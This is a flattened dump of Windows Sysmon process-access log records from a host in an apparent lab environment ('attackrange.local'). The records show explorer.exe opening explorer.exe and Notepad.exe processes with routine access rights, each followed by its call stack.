22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696669Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696668Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696667Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696666Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696665Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696664Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696663Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696662Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696661Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696660Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696659Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696658Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696657Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696656Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696655Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696654Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696653Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696652Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696651Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696650Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696649Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 